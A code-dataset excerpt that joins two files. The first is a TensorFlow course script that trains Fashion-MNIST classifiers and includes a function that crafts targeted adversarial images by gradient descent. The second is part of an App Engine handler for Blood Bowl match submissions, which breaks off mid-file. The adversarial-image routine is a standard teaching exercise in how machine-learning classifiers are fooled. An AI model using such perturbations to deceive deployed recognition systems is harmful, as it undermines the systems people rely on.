y_test, n_train, n_test, n_labels, h, w = get_data()\n\n x = tf.placeholder(dtype=tf.float32, shape=(None, h, w, 1), name='x')\n y = tf.placeholder(dtype=tf.int32, shape=(None,), name='y')\n test_mode = tf.placeholder_with_default(\n input=tf.constant(value=False, dtype=tf.bool, shape=(), name='test_mode_default'),\n shape=(),\n name='test_mode'\n )\n\n # Define the model.\n model_kwargs['test_mode'] = test_mode\n y_predict = model_fn(x, n_labels, **model_kwargs)\n\n # Define the loss function.\n loss = tf.reduce_mean(\n tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=y_predict, name='non_reduced_loss'),\n name='reduced_loss'\n )\n\n # Define the optimizer.\n optimizer_kwargs = dict() if learning_rate is None else {'learning_rate': learning_rate}\n optimizer = tf.train.AdamOptimizer(**optimizer_kwargs).minimize(loss)\n\n # Define accuracy operator.\n correct_pred = tf.equal(tf.cast(tf.argmax(y_predict, axis=1), tf.int32), y)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n # Add loss and accuracy to the summary, in order to view it in TensorBoard.\n tf.summary.scalar('loss', loss)\n tf.summary.scalar('accuracy', accuracy)\n summarize = tf.summary.merge_all()\n\n # Collect losses and accuracies, both for train-data and for test-data.\n train_losses = list()\n train_accuracies = list()\n test_losses = list()\n test_accuracies = list()\n\n init = tf.global_variables_initializer()\n\n # Define the directories that will be created with the TensorBoard data and checkpoints.\n now_str = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n logs_dir_name = os.path.join('logs', model_fn.__name__, now_str)\n checkpoint_directory = os.path.join(logs_dir_name, 'checkpoints')\n checkpoint_prefix = os.path.join(checkpoint_directory, \"ckpt\")\n saver = tf.train.Saver(max_to_keep=num_steps)\n train_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'train'),\n tf.get_default_graph())\n test_writer = tf.summary.FileWriter(os.path.join(logs_dir_name, 'test'),\n tf.get_default_graph())\n with tf.Session() as sess:\n sess.run(init)\n for i in range(num_steps):\n # Sample a random mini-batch of samples from the training data.\n train_batch_indices = np.random.choice(n_train, size=batch_size)\n x_train_batch = x_train[train_batch_indices]\n y_train_batch = y_train[train_batch_indices]\n\n # Run the graph in that mini-batch, including the optimizer to update the weights.\n train_loss, train_accuracy, train_summary, _ = sess.run(\n fetches=[loss, accuracy, summarize, optimizer],\n feed_dict={x: x_train_batch, y: y_train_batch}\n )\n\n train_losses.append(train_loss)\n train_accuracies.append(train_accuracy)\n train_writer.add_summary(train_summary, i)\n\n # Sample a random mini-batch of samples from the testing data.\n test_batch_indices = np.random.choice(n_test, size=batch_size)\n x_test_batch = x_test[test_batch_indices]\n y_test_batch = y_test[test_batch_indices]\n\n # Run the graph in that mini-batch, excluding the optimizer (to avoid\n # update the weights according to the test data, strictly forbidden :))\n test_loss, test_accuracy, test_summary = sess.run(\n fetches=[loss, accuracy, summarize],\n feed_dict={x: x_test_batch, y: y_test_batch, test_mode: True}\n )\n\n test_losses.append(test_loss)\n test_accuracies.append(test_accuracy)\n test_writer.add_summary(test_summary, i)\n\n # Every print_steps iterations print train-loss.\n if i % print_steps == 0:\n print(\"Iter {:05d} train-loss {:.2f} train-accuracy {:.2f}\".format(i, train_loss, train_accuracy))\n 
print(\"Iter {:05d} test-loss {:.2f} test-accuracy {:.2f}\".format(i, test_loss, test_accuracy))\n\n # Every save_checkpoint_steps iterations save a checkpoint.\n if i % save_checkpoint_steps == 0:\n saver.save(sess, save_path=checkpoint_prefix, global_step=i)\n\n # After the training was finished, load the latest checkpoint and evaluate the model on\n # all samples in the test-data.\n all_test_losses = list()\n all_test_accuracies = list()\n with tf.Session() as sess:\n latest_checkpoint = tf.train.latest_checkpoint(checkpoint_directory)\n new_saver = tf.train.import_meta_graph(latest_checkpoint + '.meta')\n new_saver.restore(sess, latest_checkpoint)\n for i in range(n_test // batch_size):\n x_test_batch = x_test[i:i+batch_size]\n y_test_batch = y_test[i:i+batch_size]\n\n # Run the graph in that mini-batch, including the optimizer to update the weights.\n test_loss, test_accuracy = sess.run(\n fetches=[loss, accuracy],\n feed_dict={x: x_test_batch, y: y_test_batch}\n )\n all_test_losses.append(test_loss)\n all_test_accuracies.append(test_accuracy)\n\n all_test_loss = np.array(all_test_losses).mean()\n all_test_accuracy = np.array(all_test_accuracies).mean()\n print(\"Total test-loss {:.2f} test-accuracy {:.2f}\".format(all_test_loss, all_test_accuracy))\n\n train_writer.close()\n test_writer.close()\n\n\ndef find_adversarial_image(checkpoint):\n \"\"\"\n Finds and plots the original image with the true-label and prediction,\n and the adversarial image with the (wrong) prediction.\n :param checkpoint: A checkpoint of a trained model.\n \"\"\"\n x_train, y_train, x_test, y_test, n_train, n_test, n_labels, h, w = get_data()\n\n # Load the saved graph.\n new_saver = tf.train.import_meta_graph(checkpoint + '.meta')\n graph = tf.get_default_graph()\n\n # Extract the placeholders for the loaded graph,\n # and create additional tensors which calculate the classes' probabilities\n # and final class prediction (argmax of the probabilities).\n x = graph.get_tensor_by_name('x:0')\n y = graph.get_tensor_by_name('y:0')\n test_mode = graph.get_tensor_by_name('test_mode:0')\n predict_logits = graph.get_tensor_by_name('predict:0')\n predict_prob = tf.nn.softmax(logits=predict_logits, axis=1)\n # predict_class = tf.argmax(predict_prob, axis=1)\n loss = graph.get_tensor_by_name('reduced_loss:0')\n\n # Sample a random image from the training data, and sample a wrong label for it.\n i = np.random.randint(n_train)\n image = x_train[i]\n true_label = y_train[i]\n target_label = np.random.choice(list(set(np.arange(n_labels)) - {true_label}))\n\n # Create the image-loss, which implicates that the\n # resulting image will be close to the original one.\n image_tensor = tf.constant(value=image, dtype=tf.float32, name='source_image')\n image_loss = tf.reduce_mean(tf.abs(tf.subtract(x, image_tensor, name='sub'), 'abs'), name='image_loss')\n\n # Define the new loss as the weighted sum of the original loss and the image-loss.\n image_loss_weight = 0.05\n new_loss = tf.add(loss, image_loss_weight * image_loss)\n\n # Create a symbolic tensor calculating the gradient\n # of the new loss with respect to the input image.\n grad = tf.gradients(ys=new_loss, xs=[x])\n\n curr_image = image.copy().reshape(1, 28, 28, 1)\n orig_classes_prob = None\n target_label_reshaped = np.array([target_label], dtype=np.int32)\n\n with tf.Session() as sess:\n new_saver.restore(sess, checkpoint)\n\n for i in range(10000):\n # Calculate the gradient with respect to the input image,\n # as well as the predicted classes' probabilities.\n grad_image, 
classes_prob = sess.run(\n [grad, predict_prob],\n feed_dict={x: curr_image, y: target_label_reshaped, test_mode: True}\n )\n\n # Take the relevant values, as the sess.run return a list of nested values...\n grad_image = grad_image[0][0]\n classes_prob = classes_prob[0]\n\n # In case this is the first iteration, save the classes' probabilities\n # as they are the original prediction.\n if i == 0:\n orig_classes_prob = np.copy(classes_prob)\n\n # print('True/Target-label probabilities = {:.2f} ; {:.2f}'.format(classes_prob[target_label],\n # classes_prob[true_label]))\n\n if classes_prob[target_label] > 0.95:\n break\n\n # Update the current-image with respect to the gradient of the new loss function.\n # This makes the loss function decrease, so the prediction gets close to the target\n # label, and the image remains not fat from the original one.\n learning_rate = 0.001\n curr_image -= learning_rate * grad_image\n\n # Plot the original image, the added noise, and the final adversarial image.\n plt.subplot(1, 3, 1)\n plt.axis('off')\n plt.imshow(image[:, :, 0], cmap='gray')\n plt.title('{}, w.p. {:.4f}'.format(class_names[true_label], orig_classes_prob[true_label]))\n\n plt.subplot(1, 3, 2)\n plt.axis('off')\n plt.imshow(curr_image[0, :, :, 0] - image[:, :, 0], cmap='gray')\n plt.title('Add noise...')\n\n plt.subplot(1, 3, 3)\n plt.axis('off')\n plt.imshow(curr_image[0, :, :, 0], cmap='gray')\n plt.title('{}, w.p. {:.4f}'.format(class_names[target_label], classes_prob[target_label]))\n plt.show()\n\n\ndef main():\n # train(mlp, 64)\n # train(mlp, 64, dropout_rate=0.25)\n # train(conv_net, 64)\n train(conv_net, 64, dropout_rate=0.25)\n # find_adversarial_image(checkpoint='logs/conv_net/2019_11_16_16_38_00_drop_025/checkpoints/ckpt-50000')\n pass\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "AlonNT/APML", "sub_path": "ex1/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 11872, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.datasets.fashion_mnist.load_data", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets.fashion_mnist", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.bool", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", 
"line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 81, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 82, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 99, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 151, "usage_type": "attribute"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 152, "usage_type": "call"}, 
{"api_name": "tensorflow.train", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 183, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 183, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 184, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 193, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 205, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.subtract", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 265, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "model.conv_net", "line_number": 274, "usage_type": "argument"}]} +{"seq_id": "41213090574", "text": "\nfrom google.appengine.api.labs import taskqueue\nfrom google.appengine.api import mail\nfrom google.appengine.ext import db\nimport re, logging, random, datetime\n\nfrom models import *\nfrom grappl.utils import batch_put\nimport views, misc\n\n\ndef prepare_submit(data, handler=None, localtest=False):\n\n def read_and_delete(key):\n ret = data.get(key)\n if ret:\n del data[key]\n return ret\n else:\n return \"\"\n\n signature = read_and_delete(\"signature\")\n md5 = read_and_delete(\"md5\")\n disconnect = bool(read_and_delete(\"disconnect\"))\n bblog = read_and_delete(\"bblog\")\n\n # get team entities\n team_names = [data[\"home_name\"], data[\"away_name\"]]\n teams = [Team.get_or_insert(name) for name in team_names]\n\n # this is our match lookup aid\n match_lookup = MatchLookup.get_or_insert(MatchLookup.get_key_name(teams))\n logging.debug(\"looked up %s\" % match_lookup.get_string())\n\n # There is a race condition here. We need to refetch the last\n # match inside a transaction before we create the new match.\n def get_or_create_match():\n previous_matches = Match.all().ancestor(\n match_lookup).order(\"-created\").fetch(1)\n\n if previous_matches:\n last_match = previous_matches[0]\n last_md5 = SubmitData.all().ancestor(last_match).get().md5\n else:\n last_match = None\n last_md5 = None\n\n # Create the match if any of the following are true:\n # * their is no prior match on record between these two teams\n # * the MD5 hashes of this submit and the submit of the last match don't\n # match up\n if not last_match or last_md5 != md5:\n match = Match(parent = match_lookup, disconnect = disconnect)\n match.put()\n created = True\n else:\n match = last_match\n match.both_submitted = True\n match.put()\n created = False\n\n submit_data = SubmitData(\n key_name = signature,\n parent = match,\n disconnect = disconnect,\n md5 = md5,\n data = data,\n bblog = bblog)\n submit_data.put()\n\n return (match, submit_data, created)\n\n logging.debug(\"calling get_or_create_match for %s\" % match_lookup.get_string())\n match, submit_data, created = db.run_in_transaction(get_or_create_match)\n\n if created:\n try:\n # if we created the match, we will initiate processing\n logging.debug(\"match %s created\" % match_lookup.get_string())\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_submit(submit_data, localtest=localtest)\n \n else:\n logging.debug(\"match %s updated; spawning submit task\" %\n match_lookup.get_string())\n\n taskqueue.add(url=\"/grappl/tasks/submit\", params={\n 'submit_data_key_string': submit_data.key(),\n })\n\n # if we receive an exception delete the match to allow a retry\n except:\n match.delete()\n submit_data.delete()\n raise\n\n else:\n # check to make sure everything is consistent\n submit_data2 = SubmitData.all().ancestor(\n match).filter(\"__key__ !=\", submit_data.key()).fetch(1)[0]\n\n my_data = submit_data.data\n their_data = submit_data2.data\n\n assert_log = 
misc.AssertLog(match_lookup.get_string())\n for key in my_data.keys():\n assert_log.check(my_data[key], their_data[key], \"my %s\" % key)\n\n for key in their_data.keys():\n assert_log.check(their_data[key], my_data[key], \"their %s\" % key)\n\n if assert_log.mail():\n logging.warning(\"%s verification failed.\" % match_lookup.get_string())\n\n\ndef process_submit(submit_data, localtest=False):\n \"\"\"Submit the match.\n \n Ideally we want this whole post to be a transaction, but it would require us\n to lock the whole datastore which is not GAE-like. We can take advantage of\n memcache to ensure that the updates won't become visible to the web page\n until we're done and we clear out the relevant memcache entries.\n\n Still, we want to not commit the match record entries (TeamRecord and\n PlayerRecord) until the last possible moment to make the possibility of a\n parallel memcache clear presenting an inconsistent view to the users view\n maximally unlikely.\"\"\"\n\n data = submit_data.data\n match = submit_data.parent()\n match_lookup = match.parent()\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n\n # First extract the information into the right categories:\n # team data,\n # team record data,\n # team player data, and\n # team player record data\n #--------------------------------------------------------------------#\n\n both_team_data = ({}, {})\n both_players_data = ({}, {})\n\n both_team_record_data = ({}, {})\n both_player_records_data = ({}, {})\n\n def str_getter(val): return val # do not use str() in case of unicode\n def int_getter(val): return int(val)\n def bool_getter(val):\n if val:\n return True\n else:\n return False\n\n # ReferenceProperties\n def position_getter(val): return db.Key.from_path(\"Position\", val)\n def race_getter(val): return db.Key.from_path(\"Race\", val)\n\n def skills_getter(val): \n skills = []\n for skill_name in [s.strip() for s in val.split(\",\")]:\n if skill_name:\n skills.append(db.Key.from_path(\"Skill\", skill_name))\n return skills\n\n def injuries_getter(val): \n injuries = []\n for injury_name in [s.strip() for s in val.split(\",\")]:\n if injury_name:\n injuries.append(db.Key.from_path(\"Injury\", injury_name))\n return injuries\n\n team_attr_map = {\n # fixed\n \"name\": (True, str_getter),\n \"race\": (True, race_getter),\n \"logo\": (True, str_getter),\n \"color\": (True, int_getter),\n\n # profile\n \"cash\": (False, int_getter),\n \"ff\": (False, int_getter),\n \"rerolls\": (False, int_getter),\n \"apoths\": (False, int_getter),\n \"cheers\": (False, int_getter),\n \"coaches\": (False, int_getter),\n\n # stats\n \"result\": (False, int_getter),\n \"tv_for\": (False, int_getter),\n \"tv_against\": (False, int_getter),\n }\n\n player_attr_map = {\n # fixed\n \"number\": (True, int_getter),\n \"bb_id\": (True, int_getter),\n \"position\": (True, position_getter),\n \"name\": (True, str_getter),\n\n # profile\n \"mv\": (False, int_getter),\n \"st\": (False, int_getter),\n \"ag\": (False, int_getter),\n \"av\": (False, int_getter),\n \"level\": (False, int_getter),\n \"spp\": (False, int_getter),\n \"value\": (False, int_getter),\n \"skills\": (False, skills_getter),\n \"injuries\": (False, injuries_getter),\n\n # other\n \"match_injuries\": (False, injuries_getter),\n\n # stats\n \"played\": (False, int_getter),\n \"mvps\": (False, int_getter),\n \"tds_for\": (False, int_getter),\n \"passes_for\": (False, int_getter),\n \"pyards_for\": (False, int_getter),\n \"rec_for\": (False, int_getter),\n \"ryards_for\": (False, 
int_getter),\n \"int_for\": (False, int_getter),\n \"int_against\": (False, int_getter),\n \"tckl_for\": (False, int_getter),\n \"tckl_against\": (False, int_getter),\n \"kills_for\": (False, int_getter),\n \"kills_against\": (False, int_getter),\n \"cas_for\": (False, int_getter),\n \"cas_against\": (False, int_getter),\n \"ko_for\": (False, int_getter),\n \"ko_against\": (False, int_getter),\n \"stun_for\": (False, int_getter),\n \"stun_against\": (False, int_getter),\n \"inj_for\": (False, int_getter),\n \"inj_against\": (False, int_getter),\n }\n\n player_stat_regex = re.compile(\n r\"(?P\\w+)_(?Pp\\d+)_(?P\\w+)\")\n\n for key, value in sorted(data.items()):\n hit = player_stat_regex.match(key)\n if hit:\n # it's a player attribute\n\n def get_map(team_id, player_id, is_player_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_players_data if is_player_data else\n both_player_records_data)\n\n return data[index].setdefault(player_id, {})\n\n team_id, player_id, attr = [str(x) for x in hit.groups()]\n is_player_data, converter = player_attr_map[attr]\n map = get_map(team_id, player_id, is_player_data)\n\n else:\n # it's a team attribute\n\n def get_map(is_team_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_team_data if is_team_data else\n both_team_record_data)\n\n return data[index]\n\n team_id, attr = [str(x) for x in key.split(\"_\", 1)]\n is_team_data, converter = team_attr_map[attr]\n map = get_map(is_team_data)\n\n map[attr] = converter(value)\n\n\n # Build team aggregate statistics\n #--------------------------------------------------------------------#\n \n for which_team, team_record_data in enumerate(both_team_record_data):\n for attr in sorted(TeamStats.properties()):\n if attr.startswith(\"tv_\"):\n # these are already handled\n continue\n\n if \"for\" in attr:\n opp_attr = attr.replace(\"for\", \"against\")\n else:\n opp_attr = attr.replace(\"against\", \"for\")\n\n def compute_aggregate(which_team, attr):\n return sum([v.get(attr, 0) for v in\n both_player_records_data[which_team].values()])\n\n inputs = ((which_team, attr), (which_team ^ 1, opp_attr))\n sums = [compute_aggregate(*input) for input in inputs]\n\n if all([s != 0 for s in sums]) and not any(\n [x for x in (\"cas_\", \"kills_\", \"stun_\", \"ko_\") if x in attr]):\n assert_log.check(sums[0], sums[1], context=\"aggregate sum for %s\" % attr)\n\n # as a safety, in case we fail we take the maximum of the two\n team_record_data[attr] = max(sums)\n\n # Now build the actual models\n #--------------------------------------------------------------------#\n\n both_teams = []\n both_team_records = []\n both_players = ([], [])\n both_player_records = ([], [])\n\n for team_data in both_team_data:\n # Again, like match, we need to create (\"put\") the team if it doesn't\n # already exist. 
Fortunately this is an idempotent operation.\n team = Team.get_by_key_name(team_data['name'])\n team.race = team_data['race']\n team.logo = get_logo(team_data['logo'])\n team.color = get_color(team_data['color'])\n team.last_active = datetime.date.today()\n team.retired = False\n both_teams.append(team)\n\n for which_team, team_record_data in enumerate(both_team_record_data):\n team = both_teams[which_team]\n team_record_data[\"parent\"] = match\n team_record_data[\"key_name\"] = \"%s\" % which_team\n team_record_data[\"tv\"] = team_record_data[\"tv_for\"]\n team_record_data[\"disconnect\"] = submit_data.disconnect\n team_record_data[\"team\"] = team\n team_record_data[\"glicko_r\"] = team.glicko_r\n team_record_data[\"glicko_RD\"] = team.glicko_RD\n team_record_data[\"status\"] = team.status\n\n both_team_records.append(TeamRecord(**team_record_data))\n\n for which_team, players_data in enumerate(both_players_data):\n for player_key, player_data in players_data.items():\n # For the players, just like with the teams and the match, we need to\n # create (\"put\") the entities first before we can do anything with\n # them. Just like with the teams, this is an idempotent operation.\n team = both_teams[which_team]\n player_data[\"team\"] = team.key()\n player = Player.create(**player_data)\n both_players[which_team].append(player)\n\n for which_team, player_records_data in enumerate(\n both_player_records_data):\n for which_player, player_record_data in enumerate(\n player_records_data.values()):\n\n player_record_data[\"parent\"] = match\n player_record_data[\"key_name\"] = \"%s:%s\" % (which_team, which_player)\n player_record_data[\"player\"] = (\n both_players[which_team][which_player])\n player_record = PlayerRecord(**player_record_data)\n\n both_player_records[which_team].append(player_record)\n\n # Prepare to commit\n #--------------------------------------------------------------------#\n put_list = []\n\n # Update records\n for players, player_records in zip(both_players, both_player_records):\n for player, player_record in zip(players, player_records):\n put_list.append(player)\n put_list.append(player_record)\n\n for team, team_record in zip(both_teams, both_team_records):\n put_list.append(team)\n put_list.append(team_record)\n\n # Commit\n #--------------------------------------------------------------------#\n\n # Batch commit! This is as close to a transaction as we are going to get.\n logging.debug(\"preparing to commit phase 1 %s \" % match_lookup.get_string())\n batch_put(put_list)\n\n put_list = []\n # Add some last-minute links to speed things up. 
We couldn't do this before\n # because the entities we're linking to didn't exist in the datastore yet\n for which_team, (team, team_record) in enumerate(zip(both_teams, both_team_records)):\n team_record.opponent_record = both_team_records[which_team ^ 1]\n put_list.append(team_record)\n\n for player_record in both_player_records[which_team]:\n player_record.team_record = team_record\n put_list.append(player_record)\n\n logging.debug(\"preparing to commit phase 2 %s \" % match_lookup.get_string())\n db.put(put_list)\n\n # Done!\n logging.debug(\"submit task for %s terminating successfully\" %\n match_lookup.get_string())\n\n match.processed = True\n match.put()\n\n assert_log.mail()\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_update(match)\n else:\n logging.debug(\"spawning update task for %s\" % match_lookup.get_string())\n\n # We do this separately because otherwise we run up against the 30 second\n # limit\n taskqueue.add(url=\"/grappl/tasks/update\", params={\n 'match_key_string': match.key(),\n })\n\n\ndef process_update(match):\n match_lookup = match.parent()\n put_list = []\n\n logging.debug(\"preparing to update for %s\" % match_lookup.get_string())\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n season, week = misc.get_ofl_season_and_week()\n\n # Update team information\n #--------------------------------------------------------------------#\n\n team_records = list(match.get_team_records_query())\n teams = [record.team for record in team_records]\n coach_stats_list = []\n \n for team, team_record in zip(teams, team_records):\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if team.teamrecord_set.count() > team.matches:\n team.update(team_record)\n coach = team.coach\n if coach:\n coach.last_active = datetime.date.today()\n coach_stats = CoachStats.all().ancestor(coach).get()\n coach_stats.update(team_record)\n coach_stats_list.append(coach_stats)\n\n # OFTL eligibility rule checks\n if not team.check_eligibility(season=season):\n team.set_flag(TeamProfile.INELIGIBLE_FLAG)\n\n # retirement (not by death)\n active_player_count = 0\n player_keys = [pr.player.key() for pr in team_record.playerrecord_set]\n for player in team.player_set:\n if not player.key() in player_keys:\n if player.retired == False:\n player.retired = True\n put_list.append(player)\n\n if not player.retired:\n active_player_count += 1\n\n # boost TV for potential loners\n if active_player_count < 11:\n team.tv += (11 - active_player_count) * 50\n\n # Update player information\n #--------------------------------------------------------------------#\n\n player_records = list(match.get_player_records_query())\n players = [record.player for record in player_records]\n\n # Structure to map to the already-updated player team.\n # We use this map because 'player.team' and the same team indexed in\n # 'teams' do not point to the same object. To avoid conflict we\n # update the one in 'teams' through the map\n team_map = dict((t.key(), t) for t in teams)\n\n # Keep track of the number of players that violate the SPP check. 
